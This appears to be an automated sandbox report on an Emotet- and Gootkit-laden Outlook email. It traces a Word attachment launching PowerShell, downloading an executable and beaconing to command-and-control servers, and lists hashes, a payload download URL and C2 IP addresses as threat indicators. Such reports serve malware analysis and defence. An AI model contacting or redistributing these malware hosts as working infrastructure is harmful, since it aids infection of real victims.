File name: FW Bernardo Jay Ann S Ref Id X761974.msg

Full analysis: https://app.any.run/tasks/6f3d287b-2806-496b-a419-b361292c0168
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 13:46:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, gootkit, loader, emotet, emotet-doc
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5: 5C0E3DC35BE70B767911DE234E0C05FC
SHA1: E8961F1B1B246ED136E2E3241A2214F90F31AF78
SHA256: A834CB03CDCC7BD7757448701AA5451EEA2A0FA9F4C31E5B8065AE9726DE411D
SSDEEP: 3072:vIO77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q47PfIiOmic9eScu:vV77HUUUUUUUUUUUUUUUUUUUT52VVDXg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 235.exe (PID: 3052)
      • soundser.exe (PID: 4044)
      • 235.exe (PID: 2372)
      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 2396)
      • soundser.exe (PID: 3588)
    • GOTKIT detected

      • powershell.exe (PID: 2196)
      • 235.exe (PID: 2372)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2196)
    • Emotet process was detected

      • soundser.exe (PID: 4044)
      • soundser.exe (PID: 2396)
    • EMOTET was detected

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
    • Connects to CnC server

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3268)
      • 235.exe (PID: 3052)
      • soundser.exe (PID: 4044)
      • soundser.exe (PID: 2396)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2196)
      • 235.exe (PID: 2372)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3268)
      • OUTLOOK.EXE (PID: 2952)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2952)
      • powershell.exe (PID: 2196)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2952)
      • soundser.exe (PID: 2932)
    • Starts itself from another location

      • 235.exe (PID: 2372)
    • Connects to server without host name

      • soundser.exe (PID: 2932)
      • soundser.exe (PID: 3588)
    • Reads internet explorer settings

      • OUTLOOK.EXE (PID: 2952)
      • helppane.exe (PID: 3100)
    • Uses RUNDLL32.EXE to load library

      • control.exe (PID: 2340)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3336)
      • WINWORD.EXE (PID: 3268)
      • OUTLOOK.EXE (PID: 2952)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3268)
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
Total processes: 57
Monitored processes: 15
Malicious processes: 8
Suspicious processes: 1

Behavior graph

Edge legend: start; drop and start. Process nodes in the graph, in order:
  • outlook.exe
  • winword.exe (no specs)
  • winword.exe (no specs)
  • #GOOTKIT powershell.exe
  • 235.exe (no specs)
  • #GOOTKIT 235.exe
  • #EMOTET soundser.exe (no specs)
  • #EMOTET soundser.exe
  • explorer.exe (no specs)
  • Sharing Elevated Virtual Factory (no specs)
  • helppane.exe
  • control.exe (no specs)
  • rundll32.exe (no specs)
  • #EMOTET soundser.exe (no specs)
  • #EMOTET soundser.exe

Process information

PID 2952
CMD: "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW Bernardo Jay Ann S Ref Id X761974.msg"
Path: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Outlook
Version: 14.0.6025.1000

PID 3268
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: OUTLOOK.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID 3336
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID 2196
CMD: powershell -enc [encoded command omitted in this copy of the report]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3052
CMD: "C:\Users\admin\235.exe"
Path: C:\Users\admin\235.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile ikstaller
Exit code: 0
Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850)

PID 2372
CMD: --ebe2cb72
Path: C:\Users\admin\235.exe
Parent process: 235.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile ikstaller
Exit code: 0
Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850)

PID 4044
CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: 235.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile ikstaller
Exit code: 0
Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850)

PID 2932
CMD: --3ab57678
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: soundser.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile ikstaller
Exit code: 0
Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850)

PID 3324
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1868
CMD: C:\Windows\system32\DllHost.exe /Processid:{72A7994A-3092-4054-B6BE-08FF81AEEFFC}
Path: C:\Windows\system32\DllHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: COM Surrogate
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 4 192
Read events: 3 277
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 6
Text files: 26
Unknown types: 22

Dropped files

  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Local\Temp\CVRE696.tmp.cvr
    Type, MD5, SHA256: not recorded
  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Local\Temp\~DFFA38EEDFE794DA62.TMP
    Type, MD5, SHA256: not recorded
  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745 (2).doc\:Zone.Identifier:$DATA
    Type, MD5, SHA256: not recorded
  • PID 3268, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVRF9C0.tmp.cvr
    Type, MD5, SHA256: not recorded
  • PID 3268, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\OICE_E8638DFC-1D2C-4B3F-B30C-4535D291AB8E.0\65CA99C5.doc\:Zone.Identifier:$DATA
    Type, MD5, SHA256: not recorded
  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm
    Type: pgc
    MD5: D3AF71A54A89E4912301515389F36E76
    SHA256: DFF85BCBAEC6D8ED8A28C65B01D79126B554E53BBCDAAD767878D9D1DC0ADE71
  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_4405C6842A106C4D8714AE8D826672F8.dat
    Type: xml
    MD5: EEAA832C12F20DE6AAAA9C7B77626E72
    SHA256: C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
  • PID 3268, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Type: pgc
    MD5: 063161B1F0E6D654F89E71E9B690A321
    SHA256: 11BD60BF5572DB7AE4AC66329B6C70495CA47C3F11D1DA966DEFBBE910E7AE2F
  • PID 2952, OUTLOOK.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CNDI0XYM\Data-963990-1240745.doc
    Type: document
    MD5: A9A114729097F9394B8854746CE0BE4A
    SHA256: D3256BAAC392675D7F106D18C7B6C605F85208CB93D8A105E9183D6E6BC356B7
  • PID 3268, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\OICE_E8638DFC-1D2C-4B3F-B30C-4535D291AB8E.0\65CA99C5.doc
    Type: document
    MD5: A9A114729097F9394B8854746CE0BE4A
    SHA256: D3256BAAC392675D7F106D18C7B6C605F85208CB93D8A105E9183D6E6BC356B7
HTTP(S) requests: 4
TCP/UDP connections: 9
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2952 | OUTLOOK.EXE | GET | - | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | - | - | whitelisted
2196 | powershell.exe | GET | 200 | 99.198.101.186:80 | http://riversoftbd.com/wp-content/vFikaQjYg/ | US | executable | 118 Kb | suspicious
3588 | soundser.exe | POST | - | 200.85.46.122:80 | http://200.85.46.122/dma/ | PY | - | - | malicious
2932 | soundser.exe | POST | - | 200.85.46.122:80 | http://200.85.46.122/odbc/badge/ringin/merge/ | PY | - | - | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2952 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted
- | - | 94.59.49.76:995 | - | Emirates Telecommunications Corporation | AE | malicious
3588 | soundser.exe | 200.85.46.122:80 | - | Telecel S.A. | PY | malicious
2196 | powershell.exe | 99.198.101.186:80 | riversoftbd.com | SingleHop, Inc. | US | suspicious
2932 | soundser.exe | 134.196.53.52:7080 | - | True Internet Co.,Ltd. | TH | malicious
2932 | soundser.exe | 94.59.49.76:995 | - | Emirates Telecommunications Corporation | AE | malicious
3588 | soundser.exe | 134.196.53.52:7080 | - | True Internet Co.,Ltd. | TH | malicious
2932 | soundser.exe | 41.184.246.205:53 | - | IPNXng | NG | malicious
2932 | soundser.exe | 200.85.46.122:80 | - | Telecel S.A. | PY | malicious

DNS requests

Domain | IP | Reputation
config.messenger.msn.com | 64.4.26.155 | whitelisted
riversoftbd.com | 99.198.101.186 | suspicious
dns.msftncsi.com | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
2196 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2196 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2196 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
2932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2932 | soundser.exe | Generic Protocol Command Decode | SURICATA STREAM CLOSEWAIT FIN out of window
3588 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
6 ETPRO signatures available at the full report
Process | Message
helppane.exe | C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1QLonghorn HxQ